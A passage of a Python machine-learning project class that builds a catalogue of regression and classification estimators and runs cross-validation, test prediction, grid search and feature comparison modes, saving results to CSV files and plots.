data_init_params['extra_train_data_original_df'] = self.extra_train_data[i]\n data_init_params['use_extra_train_data'] = self.use_extra_train_data[i] \n self.data[self.data_names[i]] = alm_data.alm_data(data_init_params)\n\n alm_fun.show_msg(self.log,self.verbose,'Class: [alm_project] [__init__]......done @' + str(datetime.now()))\n\n def construct_estimators(self, es_init_params):\n es = []\n es_names = []\n es_gs_range = []\n es_scores = []\n es_score_directions = []\n es_importance = []\n es_type = []\n estimators = {}\n \n #***************************************************************************************************************************************************************\n # Regression\n #***************************************************************************************************************************************************************\n # None Regressor\n es.append(None)\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({})\n es_names.append(\"None\")\n es_importance.append('none')\n es_type.append('regression') \n \n #Decision Tree Regressor\n es.append(tree.DecisionTreeRegressor(**{'max_depth':3})) \n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({'max_depth': np.arange(1, 10, 1)})\n es_names.append(\"dct_r\")\n es_importance.append('feature_importances_')\n es_type.append('regression') \n \n # kNN Regressor\n es.append(knn.KNeighborsRegressor(**{'n_neighbors': 7, 'weights': 'uniform', 'n_jobs':-1}))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({'n_neighbors': np.arange(1, 100, 1)})\n es_names.append(\"knn_r\")\n es_importance.append('none')\n es_type.append('regression')\n \n # Bayesian Ridge Regression \n es.append(lm.BayesianRidge())\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({})\n es_names.append(\"brr_r\")\n es_importance.append('coef_') \n es_type.append('regression') \n \n # xgb Regressor\n es.append(xgb.XGBRegressor(**{'subsample': 0.8, 'colsample_bytree': 1, 'max_depth': 3, 'n_estimators': 100, 'learning_rate': 0.02, 'n_jobs': 8}))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({'learning_rate':np.arange(0.01, 0.11, 0.01), 'max_depth': np.arange(3, 6, 1), 'n_estimators':range(100, 500, 100)})\n es_names.append(\"xgb_r\")\n es_importance.append('feature_importances_')\n es_type.append('regression')\n \n # Random Forest Regressor\n es.append(ensemble.RandomForestRegressor(**{'n_jobs':-1, 'n_estimators': 200, 'max_features': 'auto'}))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({'n_estimators':range(100, 500, 100), 'max_features':np.arange(0.1, 1.0, 0.1)})\n es_names.append(\"rf_r\")\n es_importance.append('feature_importances_') \n es_type.append('regression')\n \n # ElasticNet Regressor\n es.append(lm.ElasticNet(alpha=0.01, l1_ratio=0.5))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({'alpha':np.arange(0, 1, 0.1), 'l1_ratio':np.arange(0, 1, 0.1)})\n es_names.append(\"en_r\")\n es_importance.append('coef_') \n es_type.append('regression') \n \n #SVM Regressor\n es.append(svm.SVR(C=1.0, epsilon=0.1,kernel='linear'))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({})\n es_names.append(\"svm_r\")\n es_importance.append('coef_') \n es_type.append('regression') \n \n #AdaBoost ElasticNet Regressor\n es.append(ensemble.AdaBoostRegressor(lm.ElasticNet(alpha=0.1, l1_ratio=0.5),n_estimators=500, 
random_state=0))\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append({})\n es_names.append(\"ada_en_r\")\n es_importance.append('none') \n es_type.append('regression') \n \n #Keras regressor for classification \n es.append(None)\n es_scores.append('rmse')\n es_score_directions.append(0)\n es_gs_range.append(None)\n es_names.append(\"keras_r\")\n es_importance.append('none')\n es_type.append('regression')\n \n \n #***************************************************************************************************************************************************************\n # Binary classification \n #*************************************************************************************************************************************************************** \n # None Classification\n es.append(None)\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"None\")\n es_importance.append('none')\n es_type.append('classification_binary') \n \n \n #Decision tree regressor for classification\n es.append(tree.DecisionTreeRegressor(**{'max_depth':5})) \n es_scores.append('auprc')\n es_score_directions.append(1)\n es_gs_range.append({'max_depth': np.arange(1, 10, 1)})\n es_names.append(\"dct_r_c\")\n es_importance.append('feature_importances_')\n es_type.append('classification_binary') \n \n #Decision tree classifier\n es.append(tree.DecisionTreeClassifier(**{'max_depth':5})) \n es_scores.append('auprc')\n es_score_directions.append(1)\n es_gs_range.append({'max_depth': np.arange(1, 10, 1)})\n es_names.append(\"dct_c\")\n es_importance.append('feature_importances_')\n es_type.append('classification_binary') \n \n # Gradient boosted tree regressor for classification\n# es.append(xgb.XGBRegressor(**{'n_jobs': 8,'subsample': 0.8, 'colsample_bytree': 1, 'max_depth': 3, 'n_estimators': 100, 'learning_rate': 0.02}))\n es.append(xgb.XGBRegressor(**{'n_jobs': 8}))\n es_scores.append('auprc')\n es_score_directions.append(1)\n es_gs_range.append({'learning_rate':np.arange(0.01, 0.06, 0.01), 'max_depth': np.arange(3, 5, 1), 'n_estimators':range(100, 400, 100)})\n es_names.append(\"xgb_r_c\")\n es_importance.append('booster')\n es_type.append('classification_binary')\n \n # Gradient boosted tree Classifier\n es.append(xgb.XGBClassifier())\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({'learning_rate':np.arange(0.01, 0.1, 0.01), 'max_depth': np.arange(3, 6, 1), 'n_estimators':range(100, 500, 100)})\n es_names.append(\"xgb_c\")\n es_importance.append('booster')\n es_type.append('classification_binary')\n \n # Random Forest regressor for classification\n# es.append(ensemble.RandomForestRegressor(**{'n_jobs':-1, 'n_estimators': 200, 'max_features': 'auto'}))\n es.append(ensemble.RandomForestRegressor())\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({'max_features':range(10, 100, 10), 'n_estimators':range(100, 200, 100), 'test_bs_result':['True', 'False']})\n es_names.append(\"rf_r_c\")\n es_importance.append('feature_importances_')\n es_type.append('classification_binary')\n \n # Random Forest Classifier\n es.append(ensemble.RandomForestClassifier(**{'n_jobs':-1, 'n_estimators': 200, 'max_features': 'auto'}))\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({'max_features':range(10, 100, 10), 'n_estimators':range(100, 200, 100), 'test_bs_result':['True', 'False']})\n es_names.append(\"rf_c\")\n 
es_importance.append('feature_importances_')\n es_type.append('classification_binary') \n \n \n # ElasticNet Regressor for classification\n# es.append(lm.ElasticNet(alpha=0.01, l1_ratio=0.5))\n es.append(lm.ElasticNet())\n es_scores.append('auroc')\n es_score_directions.append(0)\n es_gs_range.append({'alpha':np.arange(0, 1, 0.1), 'l1_ratio':np.arange(0, 1, 0.1)})\n es_names.append(\"en_r_c\")\n es_importance.append('coef_') \n es_type.append('classification_binary') \n \n \n # Logistic Regression Classifier (binary)\n es.append(lm.LogisticRegression())\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"lgr_c\")\n es_importance.append('coef_')\n es_type.append('classification_binary')\n \n # KNN Classifier (binary) \n es.append(knn.KNeighborsClassifier(**{'n_neighbors': 10, 'weights': 'distance', 'n_jobs':-1}))\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"knn_c\")\n es_importance.append('none')\n es_type.append('classification_binary')\n \n # SVM Regressor for classification \n es.append(svm.SVR(C=1.0, epsilon=0.1,kernel='linear'))\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"svm_r_c\")\n es_importance.append('coef_') \n es_type.append('classification_binary') \n \n # SVM Classifier \n es.append(svm.SVC(**{'C': 1.0}))\n es_scores.append('auroc')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"svm_c\")\n es_importance.append('coef_')\n es_type.append('classification_binary')\n \n #Keras regressor for classification \n es.append(None)\n es_scores.append('auprc')\n es_score_directions.append(1)\n es_gs_range.append(None)\n es_names.append(\"keras_r_c\")\n es_importance.append('none')\n es_type.append('classification_binary')\n \n \n# #Tensor flow classifier\n# es.append(alphame_ml.alm_tf(**{'estimator_name': 'DNNClassifier', 'loss_name': 'cross_entropy', 'hidden_units': [100],\n# 'activation_fn': tf.nn.sigmoid,'n_classes': 2, 'batch_gd': 1,'batch_size': 0,'num_epochs': 20000, 'learning_rate': 0.0003}) )\n# es_scores.append('auroc')\n# es_score_directions.append(1)\n# es_gs_range.append({})\n# es_names.append(\"tf_c\") \n# es_importance.append('none')\n# es_type.append('classification_binary')\n \n# #Neural Network (Tensorflow)\n# es.append(alphame_ml.alm_tf())\n# es_scores.append('neg_log_loss')\n# es_score_directions.append(0)\n# es_gs_range.append({'leraning_rate':[0.01,0.1]})\n# es_names.append(\"nn_c\")\n# es_importance.append('none')\n# es_type.append('classification_multiclass')\n \n #***************************************************************************************************************************************************************\n # multi-class classification \n #*************************************************************************************************************************************************************** \n # xgb \n es.append(xgb.XGBClassifier(**{'subsample': 0.9, 'colsample_bytree': 1, 'max_depth': 5, 'n_estimators': 200, 'learning_rate': 0.05}))\n es_scores.append('neg_log_loss')\n es_score_directions.append(0)\n es_gs_range.append({'learning_rate':[0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1], 'max_depth': [3, 5]})\n # es_gs_range.append({ 'subsample':[i/10.0 for i in range(6,10)],'colsample_bytree':[i/10.0 for i in range(6,10)]})\n es_names.append(\"xgb_c\")\n es_importance.append('feature_importances_')\n 
es_type.append('classification_multiclass')\n\n # Random Forest Classifier\n es.append(ensemble.RandomForestClassifier(**{'n_jobs':-1, 'n_estimators': 200, 'max_features': 'auto'}))\n es_scores.append('neg_log_loss')\n es_score_directions.append(0)\n es_gs_range.append({'max_features':range(10, 100, 10), 'n_estimators':range(100, 200, 100), 'test_bs_result':['True', 'False']})\n es_names.append(\"rf_c\")\n es_importance.append('feature_importances_')\n es_type.append('classification_multiclass')\n\n # Gradient Boost Tree Classifier\n es.append(ensemble.GradientBoostingClassifier(**{'n_estimators': 200, 'max_features': 'auto', 'max_depth': 3}))\n es_scores.append('neg_log_loss')\n es_score_directions.append(0)\n es_gs_range.append({})\n es_names.append(\"gbt_c\") \n es_importance.append('feature_importances_') \n es_type.append('classification_multiclass')\n \n # Logistic Regression Classifier (multi-class)\n es.append(lm.LogisticRegression())\n es_scores.append('neg_log_loss')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"lgr_c\")\n es_importance.append('coef_')\n es_type.append('classification_multiclass')\n \n # KNN Classifier (multi-class)\n es.append(knn.KNeighborsClassifier(**{'n_neighbors': 10, 'weights': 'distance', 'n_jobs':-1}))\n es_scores.append('neg_log_loss')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"knn_c\")\n es_importance.append('none')\n es_type.append('classification_multiclass')\n \n # SVM Classifier \n es.append(svm.SVC(**{'C': 1.0, 'kernel': 'linear', 'probability': True}))\n es_scores.append('neg_log_loss')\n es_score_directions.append(1)\n es_gs_range.append({})\n es_names.append(\"svm_c\")\n es_importance.append('coef_')\n es_type.append('classification_multiclass')\n \n for i in range(len(es)):\n if es_type[i] == es_init_params['ml_type']:\n es_init_params['single_feature_as_prediction'] = 1\n es_init_params['estimator'] = es[i]\n es_init_params['name'] = es_names[i]\n es_init_params['gs_range'] = es_gs_range[i]\n es_init_params['score_name'] = es_scores[i]\n es_init_params['score_direction'] = es_score_directions[i]\n es_init_params['feature_importance_name'] = es_importance[i]\n es_init_params['prediction_transformation'] = None\n estimators[es_names[i]] = alm_es.alm_es(es_init_params)\n return estimators\n \n def run(self,refresh_data = 0, nofit = 0): \n return_objs = {}\n self.estimators[self.run_estimator_name].score_name = self.run_estimator_scorename \n \n # refresh data first \n \n for data_name in self.run_data_names: \n stime1 = time.time()\n self.data[data_name].train_features = self.train_features \n if refresh_data == 1: \n self.data[data_name].refresh_data()\n etime1 = time.time()\n# alm_fun.show_msg(self.log,self.verbose,\"Class: [alm_project] Fun: [run] -- Current Modes: \" + str(self.modes) + \" Current Data: \" + data_name + \", data preparation time was %g seconds\" % (etime1 - stime1)) \n \n for mode in self.modes: \n return_objs[mode] = {} \n for data_name in self.run_data_names:\n stime2 = time.time()\n #**************************************************************************\n # run project in different mode \n #**************************************************************************\n if mode == 'target_prediction': \n r = self.ml.run_target_prediction(self.estimators[self.run_estimator_name], self.data[data_name],nofit = nofit)\n return_objs[mode][data_name] = r['target_y_predicted']\n \n if mode == 'test_prediction':\n if self.grid_search_on == 1: \n r = 
self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n alm_fun.show_msg(self.log,self.verbose,'grid search best score: ' + str(r['gs_opt_cv_score']) + ' and best parameters: ' + str(r['gs_opt_params'])) \n \n r = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name],nofit = nofit)\n test_y_predicted = r['test_y_predicted'] \n test_bs_result = r['test_bs_result']\n test_bs_result.columns = ['test_' + x for x in test_bs_result.columns] \n feature_importance = r['feature_importance']\n# alm_fun.show_msg(self.log,self.verbose,str(test_bs_result))\n# alm_fun.show_msg(self.log,self.verbose,str(feature_importance)) \n test_bs_result.to_csv(self.project_path + data_name +'_test_results' + '_fold_' + str(self.data[data_name].cur_test_split_fold) + '_' + str(self.data[data_name].cur_gradient_key) +'.csv') \n return_objs[mode][data_name] = [test_bs_result,feature_importance,test_y_predicted]\n \n if mode == 'test_prediction_all_folds':\n tp_results = None\n tp_predictions = None\n feature_importance = None\n \n for j in range(self.data[data_name].test_split_folds):\n self.data[data_name].cur_test_split_fold = j \n self.data[data_name].train_features = self.cv_selected_features[j]\n\n if self.grid_search_on == 1: \n r = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n alm_fun.show_msg(self.log,self.verbose,'grid search best score: ' + str(r['gs_opt_cv_score']) + ' and best parameters: ' + str(r['gs_opt_params'])) \n \n if (self.outloop_cv_fit_once == 1) & (j!= 0): \n r = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name], nofit = 1) \n else:\n r = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name], nofit = 0)\n \n feature_fold_importance = r['feature_importance'].reset_index()\n feature_fold_importance.columns = ['feature',str(j)] \n tp_fold_predictions = r['test_y_predicted'] \n tp_fold_results = r['test_bs_result']\n tp_fold_results.columns = ['test_' + x for x in tp_fold_results.columns]\n\n if feature_importance is None:\n feature_importance = feature_fold_importance\n else:\n feature_importance = pd.merge(feature_importance,feature_fold_importance)\n \n if tp_results is None:\n tp_results = tp_fold_results\n else:\n tp_results = pd.concat([tp_results,tp_fold_results]) \n \n if self.data[data_name].if_engineer:\n predition_labels = self.data[data_name].test_splits_engineered_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient][self.data[data_name].dependent_variable] \n else:\n predition_labels = self.data[data_name].test_data_index_df.loc[self.data[data_name].test_splits_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient_key],self.data[data_name].dependent_variable] \n \n tp_fold_predictions = pd.concat([tp_fold_predictions, predition_labels], axis=1)\n\n if tp_predictions is None:\n tp_predictions = tp_fold_predictions\n else:\n tp_predictions = pd.concat([tp_predictions,tp_fold_predictions])\n \n tp_final_results = tp_results.reset_index() \n tp_final_results.to_csv(self.project_path + data_name +'_test_predition_folds_results.csv') \n\n# alm_fun.show_msg(self.log,self.verbose,str(tp_results)) \n tp_final_results = tp_final_results.groupby(['index'])['test_auroc','test_auprc','test_rfp','test_prior'].agg(['mean','std']) \n tp_final_results.columns = 
['test_macro_auroc_mean','test_macro_auroc_std','test_macro_auprc_mean','test_macro_auprc_std','test_macro_rfp_mean','test_macro_rfp_std','test_prior_mean','test_prior_std']\n tp_final_results.index = [self.predictor_name]\n \n tp_predictions.columns = [self.predictor_name,'label']\n tp_micro_preditions = tp_predictions.apply(lambda x: np.array([alm_fun.classification_metrics(np.array(tp_predictions['label']),np.array(x))[1][y] for y in ['auroc','auprc','recall_fixed_precision']]),axis = 0)\n tp_micro_preditions.drop(columns = {'label'},inplace = True)\n tp_micro_preditions = tp_micro_preditions.transpose()\n\n tp_micro_preditions.columns = ['test_micro_auroc','test_micro_auprc','test_micro_rfp'] \n tp_final_results = pd.concat([tp_final_results,tp_micro_preditions],axis = 1) \n alm_fun.show_msg(self.log,self.verbose,str(tp_final_results))\n \n tp_final_results.to_csv(self.project_path + data_name +'_test_predition_all_folds_results.csv') \n return_objs[mode][data_name] = [tp_results,tp_predictions,feature_importance,tp_final_results]\n \n if mode == \"cross_validation_all_folds\":\n cv_results = None\n for j in range(self.data[data_name].test_split_folds):\n self.data[data_name].cur_test_split_fold = j \n self.data[data_name].train_features = self.cv_selected_features[j]\n if self.grid_search_on == 1: \n [gs_opt_params, validation_cv_fold_result, gs_fold_results] = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n [test_y_predicted, feature_importance, test_bs_fold_result, test_bs_score] = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name])\n alm_fun.show_msg(self.log,self.verbose,'all_features - cv:' + str(validation_cv_fold_result['mean']) + ' ' + str(validation_cv_fold_result['ste']) + ' test:' + str(test_bs_score['mean']) + ' ' + str(test_bs_score['ste']) + \" parameters:\" + str(gs_opt_params))\n else:\n if ((self.outloop_cv_fit_once == 1) & (j!= 0)): \n cv_fold_result = self.ml.run_cv_prediction(self.estimators[self.run_estimator_name], self.data[data_name],nofit = 1)\n else:\n cv_fold_result = self.ml.run_cv_prediction(self.estimators[self.run_estimator_name], self.data[data_name],nofit = 0)\n train_cv_fold_result = cv_fold_result['train_cv_result'] \n train_cv_fold_result.columns = ['train_' + x for x in train_cv_fold_result.columns]\n \n validation_cv_fold_result = cv_fold_result['validation_cv_result'] \n validation_cv_fold_result.columns = ['validation_' + x for x in validation_cv_fold_result.columns]\n \n# test_result = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name],nofit = 1)\n# test_bs_result = test_result['test_bs_result']\n# test_bs_result.columns = ['test_' + x for x in test_bs_result.columns]\n \n cv_fold_results = pd.concat([train_cv_fold_result,validation_cv_fold_result],axis = 1) \n cv_fold_results['fold'] = j \n if cv_results is None:\n cv_results = cv_fold_results\n else:\n cv_results = pd.concat([cv_results,cv_fold_results]) \n \n# alm_fun.show_msg(self.log,self.verbose,str(cv_results))\n return_objs[mode][data_name] = [cv_results]\n \n \n if mode == 'cross_validation':\n if self.grid_search_on == 1: \n [gs_opt_params, validation_cv_result, gs_results] = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n [test_y_predicted, feature_importance, test_bs_result, test_bs_score] = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name])\n 
alm_fun.show_msg(self.log,self.verbose,'all_features - cv:' + str(validation_cv_result['mean']) + ' ' + str(validation_cv_result['ste']) + ' test:' + str(test_bs_score['mean']) + ' ' + str(test_bs_score['ste']) + \" parameters:\" + str(gs_opt_params))\n else:\n cv_result = self.ml.run_cv_prediction(self.estimators[self.run_estimator_name], self.data[data_name]) \n validation_cv_result = cv_result['validation_cv_result'] \n validation_cv_result.columns = ['cv_' + x for x in validation_cv_result.columns]\n train_cv_result = cv_result['train_cv_result'] \n train_cv_result.columns = ['cv_' + x for x in train_cv_result.columns]\n \n return_objs[mode][data_name] = [validation_cv_result, train_cv_result]\n \n if mode == 'gradient_comparison': \n gc_results = pd.DataFrame(columns = ['params','gradient','cv_score','cv_score_ste'])\n for gradient in ['no_gradient'] + self.data[data_name].gradients:\n self.data[data_name].cur_gradient_key = gradient\n if self.grid_search_on == 1: \n [gs_opt_params, validation_cv_result, gs_results] = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name],self.data[data_name].cur_test_split_fold,gradient,self.data[data_name].if_engineer) \n cur_params = gs_opt_params\n cur_cv_score = validation_cv_result.get_values()[0] \n else:\n cv_result = self.ml.run_cv_prediction(self.estimators[self.run_estimator_name], self.data[data_name])\n cur_cv_score = cv_result['validation_cv_score']\n cur_cv_score_ste = cv_result['validation_cv_score_ste']\n cur_params = self.estimators[self.run_estimator_name].estimator.get_params()\n \n gc_results.loc[gradient,'params'] = str(cur_params)\n gc_results.loc[gradient,'gradient'] = gradient\n gc_results.loc[gradient,'cv_score'] = cur_cv_score\n gc_results.loc[gradient,'cv_score_ste'] = cur_cv_score_ste\n \n if self.estimators[self.run_estimator_name].score_direction == 1: \n opt_score = max(gc_results['cv_score'])\n else:\n opt_score = min(gc_results['cv_score'])\n \n opt_gradient = gc_results.loc[gc_results['cv_score'] == opt_score, 'gradient'].get_values()[0]\n alm_fun.show_msg(self.log,self.verbose,str(gc_results)) \n gc_results.to_csv(self.project_path + data_name +'_gradient_comparison_results.csv', encoding='utf-8') \n return_objs[mode][data_name] = [gc_results,opt_score,opt_gradient]\n \n if mode == 'feature_selection': \n args = {}\n args['start_features'] = self.ml.fs_start_features\n args['T'] = self.ml.fs_T\n args['alpha'] = self.ml.fs_alpha\n args['K'] = self.ml.fs_K\n args['epsilon'] = self.ml.fs_epsilon\n \n fs_results = self.ml.feature_selection(self.estimators[self.run_estimator_name], self.data[data_name], type='local search', args=args) \n \n max_score = max(fs_results['score'])\n opt_features = fs_results.loc[fs_results['score'] == max_score,'features']\n \n fs_results.to_csv(self.project_path + data_name +'_feature_selection_results_' + str(self.data[data_name].cur_test_split_fold) + '.csv', encoding='utf-8')\n return_objs[mode][data_name] = [fs_results,max_score,opt_features]\n \n if mode == 'method_comparison':\n mc_results = None\n methods = list(self.estimators.keys())\n if 'None' in methods:\n methods.remove('None')\n\n for method in self.compare_methods: \n \n if self.grid_search_on == 1: \n [gs_opt_params, validation_cv_result, gs_results] = self.ml.grid_search(self.estimators[method], self.data[data_name])\n \n cv_result = self.ml.run_cv_prediction(self.estimators[method], self.data[data_name])\n test_result = self.ml.run_test_prediction(self.estimators[method], self.data[data_name]) \n 
validation_cv_result = cv_result['validation_cv_result'] \n validation_cv_result.index = [method]\n validation_cv_result.columns = ['cv_' + x for x in validation_cv_result.columns]\n \n test_bs_result = test_result['test_bs_result']\n test_bs_result.index = [method]\n test_bs_result.columns = ['test_' + x for x in test_bs_result.columns] \n \n if mc_results is None: \n mc_results = pd.concat([validation_cv_result, test_bs_result], axis=1)\n else:\n mc_results = pd.concat([mc_results, pd.concat([validation_cv_result, test_bs_result], axis=1)]) \n \n mc_results.to_csv(self.project_path + data_name +'_method_comparison_results.csv', encoding='utf-8') \n alm_fun.show_msg(self.log,self.verbose,str(mc_results))\n return_objs[mode][data_name] = mc_results\n \n if mode == 'grid_search':\n [gs_opt_params, gs_opt_score, gs_results] = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n max_score = gs_opt_score['mean'].get_values()[0]\n gs_results.to_csv(self.project_path + 'grid_search_results.csv', encoding='utf-8')\n return_objs[mode][data_name] = [gs_results,max_score,gs_opt_params]\n\n if mode == 'feature_comparison_test':\n fc_results = None\n fc_predictions_xyz = None\n \n for j in range(self.data[data_name].test_split_folds):\n self.data[data_name].cur_test_split_fold = j \n fc_fold_results = None\n fc_fold_predictions = None \n for i in range(len(self.compare_features)):\n self.data[data_name].train_features = self.compare_features[i]\n r = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name]) \n test_bs_result = r['test_bs_result']\n test_predictions = r['test_y_predicted']\n# test_predictions = r['test_bs_result']\n \n test_bs_result.index = [self.compare_features_name[i]]\n test_bs_result.columns = ['test_' + x for x in test_bs_result.columns] \n \n if fc_fold_results is None: \n fc_fold_results = test_bs_result\n else:\n fc_fold_results = pd.concat([fc_fold_results, test_bs_result])\n \n if fc_fold_predictions is None: \n fc_fold_predictions = test_predictions\n else:\n fc_fold_predictions = pd.concat([fc_fold_predictions, test_predictions], axis=1) \n \n alm_fun.show_msg(self.log,self.verbose,self.compare_features_name[i])\n \n if self.data[data_name].if_engineer:\n predition_labels = self.data[data_name].test_splits_engineered_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient][self.data[data_name].dependent_variable] \n else:\n predition_labels = self.data[data_name].test_data_index_df.loc[self.data[data_name].test_splits_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient_key],self.data[data_name].dependent_variable] \n \n fc_fold_predictions = pd.concat([fc_fold_predictions, predition_labels], axis=1)\n \n if fc_results is None:\n fc_results = fc_fold_results\n else:\n fc_results = pd.concat([fc_results,fc_fold_results]) \n \n if fc_predictions_xyz is None:\n fc_predictions_xyz = fc_fold_predictions\n else:\n fc_predictions_xyz = pd.concat([fc_predictions_xyz,fc_fold_predictions])\n \n fc_results = fc_results.reset_index() \n fc_results = fc_results.groupby(['index'])['test_auroc','test_auprc','test_rfp','test_prior'].agg(['mean','std']) \n fc_results.columns = ['test_macro_auroc_mean','test_macro_auroc_std','test_macro_auprc_mean','test_macro_auprc_std','test_macro_rfp_mean','test_macro_rfp_std','test_prior_mean','test_prior_std']\n\n fc_predictions_xyz.columns = self.compare_features_name + ['fitness'] \n fc_micro_preditions_xyz = 
fc_predictions_xyz.apply(lambda x: np.array([alm_fun.classification_metrics(np.array(fc_predictions_xyz['fitness']),np.array(x))[1][y] for y in ['auroc','auprc','recall_fixed_precision']]),axis = 0)\n fc_micro_preditions_xyz.drop(columns = {'fitness'},inplace = True)\n fc_micro_preditions_xyz = fc_micro_preditions_xyz.transpose()\n fc_micro_preditions_xyz.columns = ['test_micro_auroc','test_micro_auprc','test_micro_rfp']\n \n fc_results = pd.concat([fc_results,fc_micro_preditions_xyz],axis = 1)\n fc_results = fc_results.sort_values('test_micro_auprc',ascending = False)\n fc_predictions_xyz.to_csv(self.project_path + 'output/' + data_name +'_fc_predictions.csv',index = False)\n alm_fun.show_msg(self.log,self.verbose,str(fc_results))\n \n if mode == 'feature_comparison':\n fc_results = None\n fc_predictions = None\n \n for i in range(len(self.compare_features)):\n self.data[data_name].train_features = self.compare_features[i]\n if self.grid_search_on == 1: \n r = self.ml.grid_search(self.estimators[self.run_estimator_name], self.data[data_name])\n gs_opt_params = r['gs_opt_params']\n validation_cv_result = r['gs_opt_cv_result']\n gs_results = r['gs_results'] \n alm_fun.show_msg(self.log,self.verbose, self.compare_features_name[i] + ' - best params: ' + str(gs_opt_params)) \n else:\n r = self.ml.run_cv_prediction(self.estimators[self.run_estimator_name], self.data[data_name]) \n validation_cv_result = r['validation_cv_result']\n \n validation_cv_result.index = [self.compare_features_name[i]]\n validation_cv_result.columns = ['cv_' + x for x in validation_cv_result.columns]\n \n r = self.ml.run_test_prediction(self.estimators[self.run_estimator_name], self.data[data_name]) \n test_bs_result = r['test_bs_result']\n test_predicitons = pd.Series(r['test_y_predicted'], name=self.compare_features_name[i])\n test_bs_result.index = [self.compare_features_name[i]]\n test_bs_result.columns = ['test_' + x for x in test_bs_result.columns] \n \n \n if fc_results is None: \n fc_results = pd.concat([validation_cv_result, test_bs_result], axis=1)\n else:\n fc_results = pd.concat([fc_results, pd.concat([validation_cv_result, test_bs_result], axis=1)]) \n if fc_predictions is None: \n fc_predictions = test_predicitons\n else:\n fc_predictions = pd.concat([fc_predictions, test_predicitons], axis=1) \n \n alm_fun.show_msg(self.log,self.verbose,self.compare_features_name[i])\n \n alm_fun.show_msg(self.log,self.verbose,str(fc_results))\n fc_results.to_csv(self.project_path + data_name +'_feature_comparison_results' + '_fold_' + str(self.data[data_name].cur_test_split_fold) + '_' + str(self.data[data_name].cur_gradient_key) +'.csv')\n \n if self.data[data_name].if_engineer:\n predition_labels = self.data[data_name].test_splits_engineered_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient][self.data[data_name].dependent_variable] \n else:\n predition_labels = self.data[data_name].test_data_index_df.loc[self.data[data_name].test_splits_df[self.data[data_name].cur_test_split_fold][self.data[data_name].cur_gradient_key],self.data[data_name].dependent_variable] \n \n fc_predictions = pd.concat([fc_predictions, predition_labels], axis=1) \n fc_predictions.to_csv(self.project_path + data_name +'_fc_predictions' + '_fold_' + str(self.data[data_name].cur_test_split_fold) + '_' + str(self.data[data_name].cur_gradient_key) +'.csv',index = False)\n if self.estimators[self.run_estimator_name].ml_type == 'classification_binary':\n auprc_plotname = self.project_path + 'output/' + mode + '_' + data_name 
+ '_fold_' + str(self.data[data_name].cur_test_split_fold) + '_' + str(self.data[data_name].cur_gradient_key) + '_auprc.png'\n auroc_plotname = self.project_path + 'output/' + mode + '_' + data_name + '_fold_' + str(self.data[data_name].cur_test_split_fold) + '_' + str(self.data[data_name].cur_gradient_key) + '_auroc.png'\n alm_fun.plot_prc(predition_labels, fc_predictions[self.compare_features_name_forplot], auprc_plotname, 20, 10, None, 0.9, 0.9, 'AUPRC Comparison')\n alm_fun.plot_roc(predition_labels, fc_predictions[self.compare_features_name_forplot], auroc_plotname, 20, 10, None, 0.9, 0.9, 'AUROC Comparison')\n return_objs[mode][data_name] = fc_results\n \n etime2 = time.time()\n# alm_fun.show_msg(self.log,self.verbose,\"Class: [alm_project] Fun: [run] -- Current Mode: \" + \"[\" + mode + \"]\" + \" Current Data: \" + data_name + \", running time was %g seconds\" % (etime2 - stime2)) \n\n return (return_objs)\n \n def project_plot(self, data, mode, data_name, x_label, y_label, ylim_min=0, ylim_max=0.5, fig_w=20 , fig_h=5):\n title = mode + ' (' + data_name + ')' \n plot_name = self.project_path + 'output/' + mode + '_' + data_name + '.png' \n title_size = 30\n label_size = 20\n tick_size = 15 \n # alphame_ml.plot_barplot(data,fig_w,fig_h,title,title_size,x_label,y_label,label_size,tick_size,ylim_min,ylim_max,plot_name)\n\n def plots(self):\n if plot:\n if alm_dataset.ml_type == 'classification': \n fig = plt.figure(figsize=(20, 10))\n plt.clf()\n \n ax = plt.subplot(2, 2, 1)\n ax.pie([alm_dataset.prior, 1 - alm_dataset.prior], autopct='%1.1f%%', labels=['positive', 'negative'], colors=['red', 'green'])\n ax.set_title('Dataset:' + '[' + alm_dataset.name + 